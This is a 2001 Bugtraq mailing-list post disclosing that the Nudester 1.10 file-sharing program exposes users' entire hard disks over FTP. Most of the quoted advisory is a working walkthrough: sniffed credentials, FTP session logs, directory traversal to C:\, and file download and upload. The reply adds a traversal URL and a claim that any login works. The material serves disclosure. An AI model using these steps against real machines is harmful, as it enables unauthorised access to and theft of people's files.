[22316] in bugtraq
Re: [Real Security] Advisory for Nudester 1.10
daemon@ATHENA.MIT.EDU (ovix blue)
Sun Aug 19 22:05:49 2001
Message-ID: <001f01c1286e$570a2200$a500a8c0@nave>
Reply-To: "ovix blue" <ovix@comlogical.com>
From: "ovix blue" <ovix@comlogical.com>
To: <bugtraq@securityfocus.com>
Date: Sun, 19 Aug 2001 01:18:09 -0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
you can gain full ftp access without a password. just log in to the person
running nudester using any l/p and there you go. if you are using IE to
browse files you cannot directly view other folders. the workaround is
simple. ftp://127.0.0.0/../ will give you C:\ (the directory you start in is
c:\temp). i do not think you can upload files using this method, but you can
download and view folders/files. using an ftp prog such as the one that
comes with windows will allow full access. dont know why that is. not many
people use nudester (i found only 5 users when i did a search).
----- Original Message -----
From: "Gary" <Cyph3r@phreaker.net>
To: <bugtraq@securityfocus.com>
Sent: Friday, August 17, 2001 2:34 AM
Subject: [Real Security] Advisory for Nudester 1.10
> <------------------------->
> [Real Security Advisory #1]
> [ Author: Cyph3r ]
> [ www.Real-Security.org ]
> [ Date: 08/16/2001 ]
> <------------------------->
> [Vulnerable: ]
> [Nudester 1.10(& below?)]
> [ OS: Win9x/me/2k/nt/xp ]
> [ Site: www.nudester.org ]
> <------------------------->
>
> -> Severity: Malicious users can gain full access to the users Files
> (upload/download)
>
> -> Overview: Nudester, a file sharing program for porn uses the FTP
protocol
> to transfer files,
> The problem is it gives access to the whole hard disk instead of just the
> folder containing porn.
> Example:
> Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a
> file from a user on Nudester
> While having the sniffer running filtering port 21 inclusive so you can
get
> the password.
>
> <Sniffed Data>
>
> 220 ICS FTP Server ready
> user NUDESTER
> 331 Password required for NUDESTER
> pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
> 230 User NUDESTER logged in
>
> </Sniffed data>
>
> Open an ftp client and connect to the ip
>
> ftp> open ***.***.***.***
> Connected to ***.***.***.***
> 220 ICS FTP Server ready.
> User (***.***.***.***:(none)): NUDESTER
> 331 Password required for NUDESTER.
> Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
> 230 User NUDESTER logged in.
>
> - Bingo!
>
> ftp> dir
> 200 Port command successful.
> 150 Opening data connection for directory list.
> C:\TEMP\*.* not found
> 226 File sent ok
> ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
> ftp> cd ..
> 250 CWD command successful. "C:/" is current directory.
> ftp> DIR
> 200 Port command successful.
> 150 Opening data connection for directory list.
> -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
> -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
> -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
> -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
> -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
> -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
> -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
> -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
> -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
> -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
> -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
> drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
> -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
> -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
> -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
> -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
> dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
> -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
> -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
> -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
> -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
> -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
> -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
> -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
> -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
> -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
> -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
> -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
> drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
> -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
> drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
> -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
> -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
> drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
> drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
> drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
> drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
> -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
> drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
> -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
> 226 File sent ok
> ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
>
> - Lets see if we have access to download a file
>
> ftp> get netsig.txt
> 200 Port command successful.
> 150 Opening data connection for netsig.txt.
> 226 File sent ok
> ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
>
> - Yep, let's try to upload a file
>
> ftp> put c:\temp.txt
> 200 Port command successful.
> 150 Opening data connection for TEMP.TXT.
> 226 File received ok
>
> -> Conclusion: anyone can gain full access to Nudester user's files; the
> username is the same for every user
> However the password is not the same, you will have to sniff while
> downloading a file to retrieve the password,
> The only solution to this problem is not to use Nudester.
>
> -> Credits: Cyph3r - Cyph3r@phreaker.net
>
> -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
> spasms, trew, zeronine, matt, shizniz, z0mb1e
> b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.
>
>
>
